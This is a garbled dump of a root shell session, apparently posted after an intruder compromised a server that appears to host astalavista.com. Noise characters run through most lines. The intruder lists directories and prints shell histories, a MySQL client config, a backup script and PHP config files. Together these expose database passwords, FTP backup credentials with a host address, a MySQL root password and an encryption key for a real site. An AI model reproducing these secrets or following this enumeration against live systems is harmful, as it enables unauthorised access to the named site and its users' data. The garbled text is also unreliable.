7 N N9 M' G9 d0 H#####################################################7 s) o6 U4 z1 y
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
* ?$ V) Q9 V0 r* O& z4 C# |__| [__ | |__| | |__| | | | [__ | |__| #
6 G( ~1 x) h# }: L' c, x% A8 E# | | ___] | | | |___ | | \/ | ___] | | | #
4 y v( e6 G+ X# #
; j, Y$ d6 H. `+ e7 p#####################################################
& @$ Q: m) E& \) G/ x, C# #
4 ?, K' p) m+ c. W# Admin Contact - 链接标记support@secureservertech.com #
) {8 {1 n6 E1 D( a& `# #
, ]: l$ S0 g" ` g# Available ShortCuts #
/ H8 S6 A. T' `* F8 S4 n! B# #
/ {# i$ L7 l& W" w) W# nst - list active connections #
- X8 A5 w F; G2 A" n- s, i# ddos - shows how many times each ip is connected #
4 @$ S/ r3 t2 l6 ~6 k1 {7 T/ t# ltr - restart the webserver #" j- y1 J% ^. ]
# phpc - edit the php config file #
- \) `( o& o- H1 {# htc - edit the webserver configuration file #. _, g) y; E' d9 H+ t
# up - uptime #
7 C( ]" z- j; y2 i) p# etd - edit the motd of the day file #7 i; O7 z1 G4 g6 j) d
# htr - start and restart apache if needed #
, m/ h* S& {' f* x- J# syng - shows active SYN_RECV connections #" I+ a# q. z4 @$ p0 ^3 d" L
# synd - syn flood blocker - “synd -h” for usage #
' a* I" w* d0 Y' w/ L#####################################################3 x8 J+ }8 |0 o6 m- _ i' O) J
# NOTES: #
7 Q6 h9 l9 }; |# Last Upgrade - 12-08-2008 by JF #
5 q% d B5 Q+ Z8 U6 x3 H# My.cnf/Mysql Optimization - 1-28-09 #
# S+ F% b. Y) V# Z" p2 `# #" z% b2 _+ G* o2 a3 ~( @
# #% b- V, P& h" W+ C- t, Z2 x+ u/ g
# #8 W8 r" v" C9 P
#####################################################
( H% t! h: I9 N6 B3 c# x3 j2 i3 e+ K9 n; }
sh-3.2# lastlog | grep -v Never
" \/ ^/ X1 ~/ F$ bUsername Port From Latest4 Q5 [+ H. |- o/ ~* P
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009& O/ y3 r0 o2 G% C3 G, P s
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008/ h. j! \; c# h" f7 r' D" \3 l
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
2 F- s$ s; Q" O( r- kastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
7 T( {- t/ S" h& w$ u& u9 v! a! _4 ?
sh-3.2# ls -la
/ P: X O, G! C. p/ Ftotal 453376 P6 ^0 |1 [+ B8 Q
drwxr-x— 15 root root 4096 Jun 4 08:40 .+ K6 @1 ]* p# \( F! P; t9 b3 s
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 E. D/ c* ]: Y$ M2 x
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
! d& e$ y' y, u, B, d! @! e, k- m- Z9 X-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
V [1 v+ `) I$ ]+ z+ z-rw——- 1 root root 16836 Jun 4 07:21 .bash_history! C' r d, Q, ]2 D$ f# z- N( b
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
8 X0 }, k2 f* ]8 D5 m* z& [-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile/ N, P& a, ~- q4 K% I
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc, ? v& N1 @ K3 n4 c2 _4 @5 q
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh" G* n' f, R% B4 D
-rw-r–r– 1 root root 1327 Nov 29 2007 cert4 e/ m0 U& H) F6 N/ J
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql) F) K3 [3 |! x) x8 d. O
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan. ~& u5 E' H2 X/ p8 @4 d# a
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
# Y+ O" a# P; S8 e/ V-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
: h/ P5 i; t [drwx—— 2 root root 4096 Oct 28 2007 .elinks# F: v- {3 k$ ]2 e
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1' V- Q" J0 Z8 \9 d3 w$ F* s4 A
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
! u- W% u7 C. {) p-rw——- 1 root root 0 Apr 16 13:19 .history
$ F3 b# r/ W% ]-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
4 x) G( ^" R8 c0 J* S-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog% n Q+ B: r0 `+ i3 U
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
( r3 e8 h8 y' N" v8 g; g; E-rw——- 1 root root 35 Jun 2 14:23 .lesshst' W: t8 W1 r, }( y* R/ h
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp }4 V' w; b6 S5 K
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec; ?) }1 |) q2 p6 m/ X2 G
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz8 d7 N2 w. C8 e/ Y
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
) }1 p& Q1 [) I3 T) r3 J-rwx—— 1 root root 760 Sep 18 2008 lp- d9 g* @& ?1 S* W$ N* F; e4 _& U
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
x- f8 V3 N/ h! a- i; D* x; z! U-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz/ @7 f3 s3 w6 }- b0 y2 u
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1& m0 J8 k: C, ]1 n% |/ k- H: \) c
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
1 O% F1 K& W$ E* |% o) u-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz7 C3 W4 |' Z1 e: w$ ^0 ~
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3. Q2 R# F: q9 Z% e& g7 ` C, s' g
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
$ p @* y+ q3 J5 w" A, [* M/ Z-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh) g# n' Z7 e8 t4 |- l
-rw——- 1 root root 41 Oct 19 2007 .my.cnf2 K' Q8 {6 P6 t: c! p
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history! T3 p) d E) U7 D( p
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport* o. Y- |9 C, s7 N0 u
-rw——- 1 root root 41 May 20 2008 .mytop
6 T. o/ v8 f* w3 N+ sdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.68 s! l/ O( f" \9 u4 H
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz9 k0 a' C2 }$ v5 g& Z5 g# X5 `
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp2 b) g4 a2 }. u& f3 N6 W
-rw——- 1 root root 1462 Sep 21 2007 opt.php
/ ~ Z( I. F) ?: i-rw-r–r– 1 root root 3371 Sep 22 2007 p
& v V% L! ~, I' d& @5 W1 Q# u-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
, K2 E# A" y$ ~-rw——- 1 root root 1024 Feb 3 21:32 .rnd
) m }6 R- N$ \8 k, U3 l! x( o-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
, p- n8 C' s5 n5 T9 @& q-rw-r–r– 1 root root 887 Nov 28 2007 server.key4 @- p, b+ u6 J+ _' f0 X; F
drwx—— 2 root root 4096 Oct 10 2008 .ssh
, ]( ^2 c% U( n9 x- A p-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat( W {- H8 f! I M3 h
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
* s* p# W4 }- ?-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip4 a6 V4 Y4 M4 q b- ] x
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
1 [4 c: Y. G1 Ydrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
& ]: B* |, l2 u& z7 b2 b-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
3 I5 P" y9 X8 h" u6 _drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
1 ~& ~. T5 K. n f-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
* ^) @$ }) v) b; N8 Q' t' S& p7 x-rw——- 1 root root 12997 May 16 2008 .viminfo
7 \3 Y3 \) ]5 P/ j
* R8 ]6 O& r, w0 Ssh-3.2# cat .bash_history& r3 X% i0 [( L- }9 w9 R. r: ?
[snip]' d$ T: }: q+ p. v; N% h
wget cp4sst.com/sstlinux.tar.gz+ B$ g8 N, j' a) p, t/ a0 v
tar zxvf sstlinux.tar.gz
" z4 t3 K6 k" _' _ m! \3 v% M9 b6 _# Zcd linux-2.6.27.10
7 @" a4 v' O* H, o' ?: ~sh install.sh
. J9 |; | j3 c, Y! _( Z2 }. Amake bzImage ; make modules ; make modules_install ; make install
9 F, P" ~3 [3 ~. p% u; S4 ]6 K3 gmake clean; o# C4 Q& Z& E; t
service mysqld restart
$ q1 P r' w$ }% F2 r5 t5 L8 @1 {[snip]
1 m7 _! y9 ]6 }" a% y: @8 Ncd /usr/sbin/
. p* F/ K3 A' |) N/ |7 O Gchmod 4777 traceroute4 J( T& G3 ]4 |' c
chmod 4777 ping
$ H8 \: b+ l5 v/ _) e8 p0 a8 ktraceroute -I 链接标记[url]www.astalavista.ch[/url]
8 }0 r) U# o& r% w$ r; D[snip]
% |; I- d4 T- T# {5 u$ rvi /etc/csf/csf.conf3 I d: K# i0 `, z8 y
traceroute google.ch
# h) N" r" M" a/ Wservice csf restart4 v/ `1 j- W% @: n$ A
tracert google.ch( W5 `. ?/ h5 Z5 D% v: Y" H% U/ A7 j
service csf restart( v- R0 q6 b; k5 i; t! N6 w# Q
traceroute 链接标记[url]www.google.ch[/url]; t; h( @4 t* O, D! \( c
tracert 链接标记[url]www.google.ch[/url]3 X# e- j0 \. B2 q1 d/ B$ R
traceroute 链接标记[url]www.google.ch[/url]& v0 Z$ i7 a4 K0 H9 G
locate traceroute. m' b) [1 E+ o; X4 ?- G
chown 4755 /bin/traceroute9 C3 M O# s5 J
chown 4777 /bin/traceroute
. }6 h, `' J- \locate ping: v2 m2 |2 ]% k
chown 4755 /bin/ping; _% y/ U& }/ {% O1 E2 ^' N
chown 4777 /bin/ping! J* _+ G6 X+ i, m7 t9 c, U
cd /bin/
3 p% x- x( J' xls -ali | grep ping
^6 c, h. U0 `: U: echown root ping
9 h% b1 d8 s9 a( B3 K( O& R6 M3 B1 k1 ^$ Nchmod 4755 ping
' b. ]1 ^4 ~: G9 k- R" p% vls -ali | grep traceroute9 G9 b* z! T2 L8 a6 m% Z( T/ w
chown root traceroute
; t |7 N- ^0 j, h+ c2 w, C0 }chmod 4755 traceroute: m# S) Q% H) L
ls -ali | grep traceroute
~1 c5 J* _' v: N: K# Ztraceroute -I 链接标记[url]www.google.ch[/url]
& T) O( E2 I$ ytraceroute 链接标记[url]www.google.ch[/url]
9 }* j1 i- p& q, ^, awhois pmsantos.ch
" n5 X! n8 D8 H6 Y$ }[snip]9 r: Z' F. |1 m. s% S6 n4 D$ X( s9 V
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
[3 k1 Z7 b4 E0 T7 D2 V9 vmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
) j P3 y4 b2 mmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
! A1 d' E8 \ T( cmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
8 A5 J H9 F" W/ w$ _' Gtop
) v3 I1 {: L' d4 S! [ping ssth.ch
4 |2 d9 W3 v+ Hping asdlkfaljgasd???ljg???lasj.ch5 ?1 O, Y9 q: M# C8 z: a _
ping asdlkfaljgasdlasj.ch
. H8 y3 E" T6 }6 pping 链接标记[url]www.ssth.ch[/url]
/ I6 U( y, W- ^% M6 [1 fping ssth.ch
+ r+ a" y5 l5 N/ E7 T( Q: Z9 @nslookup 链接标记[url]www.google.ch[/url]
# Q% I: o6 U$ e, k$ I( `8 Knslookup 链接标记[url]www.ssth.ch[/url]
0 {' T. q9 v* ?4 Y) ~8 [) {man nslookup
Z( p \5 e) Z ^% G) Uping 链接标记[url]www.google.ch[/url]
: w& a9 i, L& M, l- enslookup 链接标记[url]www.google.ch[/url]* \1 V6 ?' n' c- X; W5 p
nslookup 链接标记[url]www.google.ch[/url]1 O" s* M6 N2 e3 _2 I& B
nslookup salfjasdlf.ch8 n8 G, b C5 H" I j2 y
[snip]
6 C$ h" s( P! M' ^openssl passwd -1 sadf9 ?8 \. _- t2 ^' g* V; V: h
openssl passwd -1 5cZNHstdTy: J N8 z$ x) Y" v
mysql
3 X& D# M5 |3 g0 nmysql1 H4 z9 n' S$ |1 n' z% R- w S
locate proftp# f( B% {# a% W- t
vi /etc/proftpd.passwd
, f5 C( u& D$ kservice proftpd restart
( }5 l6 ~2 v2 Ylocate proftpd.conf# G7 Y! J; y9 J+ v M( `( p. |) ~
vi /etc/proftpd.conf
& E8 p0 _) h. O- w2 K/ ]vi /etc/proftpd.passwd. l$ F5 r, x X3 D% ~, J
service proftpd restart9 j* \ W( [6 ~& q! L5 |" l
[snip]8 z+ D# `: I/ B+ Y2 C
/bin/sh /home/com/backup_system/backup.sh
/ o8 g4 i+ J0 O3 P: z- ?1 ptar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
% Z& N) P% n9 H% x umysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql' n( Z* c" u% O: i1 q* l
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
1 d6 D0 r2 H2 \# Z4 _9 V( J( rls -ali
6 C( O. n9 H3 J8 d" z0 b9 Q$ c: Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
/ \# T+ L' b* X) b. ^& p0 Ymysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
; o i. ?4 w5 k1 U/ E& W& j- B8 x: ~crontab -l/ `% m1 d( K& X
crontab -l, g4 O8 D9 _0 W& `
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
8 h: e; ]% M h# l5 c* n2 N/home/com/public_html/modifications/cronjobs/exploits.sh r" ]0 p$ z9 q% r X, c; q
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
0 g/ H; b" u, a8 k& [" k# ?! o# a4 t' Etar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz- l; c3 R! ~/ @- g6 a$ M5 M
cd lsws-4.0.3
7 k% Z( J# W2 V7 t3 P# Ysh install.sh! x8 x0 ?: B( Z" z
uptime3 _: Q* E. ]! d
hdparm -tt /dev/sda; w& e: A4 Y$ s: W, t/ N; S2 D
iostat! N) F1 i; X8 c+ F9 J
yum install iostat3 }: M3 p9 R7 g: I, ]$ V1 w3 N' k2 \
iostat
5 g6 T% P. c3 w b8 {& J' V) uwhereis iostat
& l; g# Z% u, @; T' ~+ y9 Jyjm clean all/ j0 }0 b& a E$ Q, ~" X' @, ^
yum clean all ; yum -y update) _+ R- v- h# w+ j
iostat
6 H- O* ?/ K6 o1 fyum install systat& y) A! }' i8 s% q5 G
rpm -qa | grep iostat
( x7 n/ ]( | O3 }7 z3 C, `0 L# yrpm -qa | grep sysstat3 J+ I9 J4 [0 N% S- r8 T$ K! I
rpm -qa | grep systat F t3 o* B3 v2 p% e# E: b
dmesg -c4 [4 S9 O1 r5 Q7 H8 \- T
sysctl -p) v% w# I1 M: o. V, M# o: k
uname -r
% d5 \( i" U- V! F9 y' ^) L. P$ xcd /usr/src5 w4 t6 `0 ^/ H4 |4 \2 {6 M8 Y% W
wget nix101.com/kernels/sstlinux.tar.gz c; H" m) C& o' T- I% c% ?
shutdown -r now1 p9 G" M* ]) a% P6 i. C$ R
nano -w /boot/grub/grub.conf
; W7 d; L- a, Q: W, {0 w/ p: z! ?" l# T( F8 q- o
sh-3.2# cat .my.cnf
! G* F3 o) u$ |% ]8 J% G N[client]
; Z/ c# r- W0 s& b: [( ~user=da_admin
4 W( g4 [5 m( k P; Wpassword=X9dctmRH* }) N8 Q0 e( u; I
) ?7 c- X6 s* W+ g6 r6 [) Nsh-3.2# cat /home/com/backup_system/backup.sh+ B/ E4 z* `- K) g( o0 I( t
#!/bin/sh+ f) m0 {7 N4 E0 Q" J) K
#####################################################################
; |1 p( r0 S0 _* R. o/ ^# ]* u) }# #
& A7 c7 w+ ~% W# incremental backup for astalavista.com #
. Y8 R+ B) E+ i# #
& [# F2 a$ ]. D. M& M# \# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #- f6 i8 H# ~8 U& w6 {; _3 D
# #/ t9 a. ?9 n7 q3 v, v( @; H4 E
#####################################################################3 t; n5 H+ o6 I9 N# j8 h e/ r5 f
[snip]5 U+ \- ^+ B' {) f
PROG_DIR=”/home/com/backup_system”;) |/ r4 `# T& Y* X2 w4 ?
BACKUP_DIR=”/home/com/backups”;
6 p" U0 t* s/ S2 L( E7 D2 QDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;% p/ J5 a9 Q( V3 X8 m
# ftp for synology backup server
- i" o' C3 B9 [+ d; E$ TFTP_HOST=”212.254.194.163″;6 x& o5 K8 ^. C6 h5 x
FTP_PORT=”21″;% `2 m& V; O h, I
FTP_USER=”astalavista.com”;) s7 i, l" }0 E, x
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;% G" ~' k: K7 h' |( k' T0 T
FTP_DIR=”/astalavista.com”;! X9 r4 `$ P' f. O4 u$ ~
# database
9 z. ?# l7 v, `* Z3 _* D7 XDB_HOST=”localhost”;
. a6 u0 b- L* rDB_USER=”contrexxuser2″;
5 Z J3 i% ?' p$ j; ZDB_PASS=”0fEYNZgXz1pKe”;
7 Y: j4 d& I2 [$ y W8 nDB_DATABASE1=”com_contrexx2_live”;
/ y: D: A/ E) F' hDB_DATABASE2=”com_contrexx2″;
7 q7 w# L/ P5 U: z$ f[snip]
7 A! N- |/ K5 N5 jftp -in $FTP_HOST $FTP_PORT <<EOF
) Z7 \% f% f$ L) a2 Aquote USER $FTP_USER' F0 w4 Q! T" c5 D# f
quote PASS $FTP_PASS+ p, L5 ?; m2 G5 V) z3 Q# p( K7 B3 }/ J
cd $FTP_DIR$ [0 _ z- Y) z) w* k" G( h
put $DB_FULLNAME-SQL_Dump.tar# \1 b/ I+ S1 L" M$ g- m8 s
put $BACKUP_FULLNAME-Public_HTML.tar8 K' |- p+ h; A- E/ g8 t2 f" p: X3 G
close" b. P' t# r4 l. k, z
bye6 a2 E# v; W! Z0 E# S
EOF! ]/ x& p1 j6 y: ~: k3 U
. Q3 _# X" \4 l+ }6 ^; e$ D" ?
sh-3.2# cd /home% g8 n% e4 K! [2 R: q) {+ x
sh-3.2# ls -la' r4 u/ A! e; U# @; h0 g
total 120
! Y2 P2 g! ]1 i8 t, fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
6 D1 x; v8 {! k( {8 p; tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ E# ~8 @* q0 n+ J; v2 l T
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
, }2 s+ |) G D; O [+ J/ [$ Z-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
0 }6 T2 j4 E3 g3 x/ v) Q-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ ?: O% x" l% ^drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
v; U- o% A7 d9 G# Jdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
4 s. {+ A5 P3 s" jdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161) g5 `3 D1 q3 ] c
drwx–x–x 10 com com 4096 Apr 28 12:40 com4 Y; M+ N0 Y4 |' N5 V
drwxr-xr-x 2 root root 4096 May 17 2007 ftp1 }) z B, O# k, P, O0 A, p
drwx—— 3 jon jon 4096 Sep 21 2007 jon& u; @6 k% e- M* q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
( ~9 Z" j0 Y- j9 j) y7 e9 Ydrwxr-xr-x 2 root root 4096 Sep 14 2007 my
( A* [" j! [ w0 t3 H9 Bdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata0 M) x0 Y, H& E5 I% Y( I# m
drwx—— 2 jon jon 4096 Sep 15 2007 test
/ @4 T7 H& a3 d$ ~1 n% h7 Tdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp% F% _' y* F: {7 z. Y& j
# {+ `# T, q+ E+ N9 Msh-3.2# cd admin+ }+ x5 `# ?( \: f4 [( f
sh-3.2# ls -la3 ]; ^9 }# E( }* r5 W# \( e
total 1735896
! h' ?9 S6 j) a+ g$ C" l* v! [drwx–x–x 9 admin admin 4096 Nov 28 2007 .
3 u- ~7 |7 H$ C. E. ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 a" A; c0 G1 [
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups2 j% w: h. O: ]$ _
drwx—— 2 admin admin 4096 Sep 28 2007 backups4 C7 ?9 g1 [3 E' r5 ?; H* C
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
1 {' F& Z' U; j4 W0 V-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
6 K9 r- s; z1 z-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
9 h4 U) ~. t2 z% `-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
2 e' V! P9 @' A$ Z+ }0 R5 f$ L+ xdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups* ]) I T& |2 C( K; T! ]
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains. \* ~: o3 E6 C" e' ~% R& k
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
`/ ]3 h8 F* o# k8 n5 `-rw-r–r– 1 root root 24 Sep 21 2007 info.php
# L3 |- Y# q F7 [% w2 {5 a1 V% Gdrwx—— 2 admin admin 4096 Sep 21 2007 mail
; A: F" u0 d. T+ A4 Y-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
, C/ ~6 X: m5 \, T9 {; N1 c-rw-r–r– 1 root root 887 Nov 28 2007 server.key& f* N2 u& ]" l4 b$ d4 z
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow d; f* G! q+ _! _3 P
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz. U! b# [+ H5 w
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
( C x$ w$ M5 T" M" f" i& g3 G+ {" ` B0 d) z3 X
sh-3.2# ..) Z0 X2 y4 ?8 r! Z. R3 L) Q
sh-3.2# cd jon: b+ S: V7 b; G- H) `
sh-3.2# ls -la
, O3 K2 d& r5 \ u! R% Dtotal 36
* P/ T; k+ f. W( S' [" fdrwx—— 3 jon jon 4096 Sep 21 2007 .2 q/ g. m; U1 k+ s- c7 b6 c$ I% y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ g- w1 ]2 z6 B. u7 a9 h-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
* }! E& |# s7 C" L-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
' M/ D c8 U% @6 L, C: A3 h-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile9 L( ?9 u) w- Z. V. R8 Y# \
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
) E, t3 A t X% f-rw-r–r– 1 root root 24 Sep 21 2007 info.php
1 m" X& S5 i$ \, Tdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
8 `# i3 g; @+ w2 v# Z
& v0 i4 O2 \. h+ P% \sh-3.2# cd ..
1 q) Y$ p, x4 ish-3.2# cd test
9 Y, [7 d& A0 { u2 L9 o: l, A; }sh-3.2# ls -la
9 f# _2 t5 R! {% z$ U! Ctotal 48
- @# h5 w4 A. I v9 o0 Jdrwx—— 2 jon jon 4096 Sep 15 2007 .
0 L# z- M' J9 \) u3 s _! @5 T9 b; ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" R4 s+ q" l9 ^4 ]0 V3 h-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
& M+ H0 }& ^2 u3 p-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
# ~" @- w4 a- k/ s" n-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
* b2 v( f9 i" s/ D-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
* C: z9 o+ b' Z* Ksh-3.2# cat .bash_history% I; i+ `* [, U$ ?* a9 f
/usr/bin/mysqladmin -u root password PoliuJhytg67" j/ A. {6 Q# @( N
1 t. L, s: ~) z* V' Q# @* Y! g
sh-3.2# cd ..
& H7 I+ k9 Z' J5 jsh-3.2# cd astanet U/ i8 }; D) L& o& ~2 d* f
sh-3.2# ls -la
' ^9 V) A. \$ X, }4 atotal 52; L' d3 i6 W$ t( C% N
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .( [' @% S% U1 l, U# w% E- l; L4 _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ... H4 Q" M f' M2 S5 H1 Y
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* G! S0 J4 [, v' t5 f7 `) O
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
7 n9 n" x* M/ _2 O* J4 {( r-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout& ?$ B( ?; B& f5 F7 P5 i7 [
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
. Y) ^9 R5 B" D4 A2 G( J: f-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
: l& m5 [- ~/ ^# ndrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
& s$ b4 K9 a) b2 Y- F( fdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
6 M: s8 [/ e6 w8 xdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 W( _) c% E: x$ C0 P2 A2 F1 \+ Y$ a-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history8 M7 K- P2 _, W9 u8 L: ?) G9 [' K
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html9 W% ?* y+ x5 I: Z# }
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
" _* N! v! @8 R& P
+ t* J8 b! c9 W- r& a9 P! Qsh-3.2# cd auth/
3 w5 S* ?6 V, msh-3.2# ls -la
* U* `4 ]( ^" y- Stotal 28
9 F& S5 a" P! p$ @& Mdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .: w0 q$ r9 \+ t5 D: N" @# g# M
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..& ]6 j/ ~& I/ [5 w' r& l: h% [) Q
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php, m |9 z$ Y" r" G
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
; k$ q7 q/ D/ ^' V" W' {" u: i2 j-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
' K4 c, Y9 V8 @/ D) k-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting( Z! P! L' @) _7 G1 J3 O, E& m
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd7 {7 e) g: A( B; ?
9 b; E0 B6 a& |sh-3.2# cat hackercontest.config.inc.php" q- [) Z1 n9 A4 l! ?+ p6 s
<?PHP
5 R! v# {( v: e( I8 f// Variabeln f?r Verbindung zur Datenbank //
" ^9 t! I% U+ L- V t$conxHost = ‘localhost’; // MySQL hostname1 `( D# @& M1 H+ y" Q9 r! E3 T
$conxUser = ‘hackercontest’; // MySQL user
* r. D: Y0 v+ W* |6 J" B7 d% ~$ S$conxPassword = ‘K6m@7dUc’; // MySQL password" j$ g) N3 Z2 m4 J: a7 B
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
- S3 v+ b+ S* F6 T9 Q7 E?>
\* H x y' J# N( Ash-3.2# cat hosting.config.inc.php7 A' o: F7 f" h% c1 Z4 c1 D4 F
<?PHP
# G4 c: Y1 Y$ D* ]. |// Variabeln f?r Verbindung zur Datenbank //
7 I. |! I$ x8 z$ v$conxHost = ‘localhost’; // MySQL hostname
6 M& m e9 K! I5 c$conxUser = ‘hostinguser’; // MySQL user
6 y# A2 k* l0 K, Q m* w% S, e5 S2 D$conxPassword = ‘cXvB3981′; // MySQL password" P- Z" e! Y5 v5 F; y7 Z ~
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
, \! S* r) \7 n?>. ]+ m) p! D0 n0 k1 J+ r
8 E7 m; Y* ~5 ?, l i, Q
sh-3.2# cd ..
